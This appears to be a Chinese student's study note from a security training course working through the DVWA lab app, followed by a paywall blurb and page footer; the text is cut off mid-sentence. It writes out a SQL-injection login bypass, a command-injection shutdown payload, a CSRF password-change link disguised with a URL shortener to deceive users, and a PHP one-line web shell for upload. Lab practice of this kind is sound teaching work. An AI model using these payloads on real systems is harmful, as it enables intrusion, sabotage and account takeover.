今天首先学习了密码登录绕过步骤如下:
1、打开Brute Force界面,测试登陆框是否存在注入,提交敏感字符测试程序是否报错。在登录界面上输入用户名admin’(使用敏感字符‘)。
2、仔细观察登录系统时地址栏中的sql语句,在用户名密码提交界面上通过注入逻辑语句使登录判断失效,进入受保护页面。admin’ or 1=1 --’
然后尝试命令注入
1、打开Command Injection界面,在该界面提供一个命令行执行环境,输入ip地址返回ping命令的结果。
2、window和linux系统都可以用&&在同一行执行多条命令,尝试注入附加命令使目标主机(延时)关机。&&shutdown -s -t 600 shutdown –a可取消关机计划
跨站请求伪造如下
1、打开CSRF界面,可在New password和Confirm new password处正常修改登录口令。
2、构造一个链接:
http://IP/DVWA/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change# (注意IP地址改为网站实际地址)
3、利用在线短链接生成器(https://www.985.so/)伪造该链接为:http://u8s.net/m9yfc
4、此时可诱骗其他用户点击该链接,通过伪造身份提交密码修改,直接跳转到修改密码成功的页面,成功把密码修改为123。
文件上传也可以进行尝试
1、建立一个PHP文件,内容为:<?php @eval($_POST['pass']);?>。
2、打开File Upload界面,将PHP一句话木马上传。
3、得到木马在服务器上的
这篇学习笔记详述了金融信息安全实训中的关键环节,包括密码登录绕过(SQL注入)、命令注入、跨站请求伪造(CSRF)的攻击与防范,以及文件上传漏洞的利用。通过实例演示了如何利用Brute Force、Command Injection、CSRF界面以及File Upload进行操作,并展示了SQL注入的探测和利用过程。
最低0.47元/天 解锁文章
扫一扫
119
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
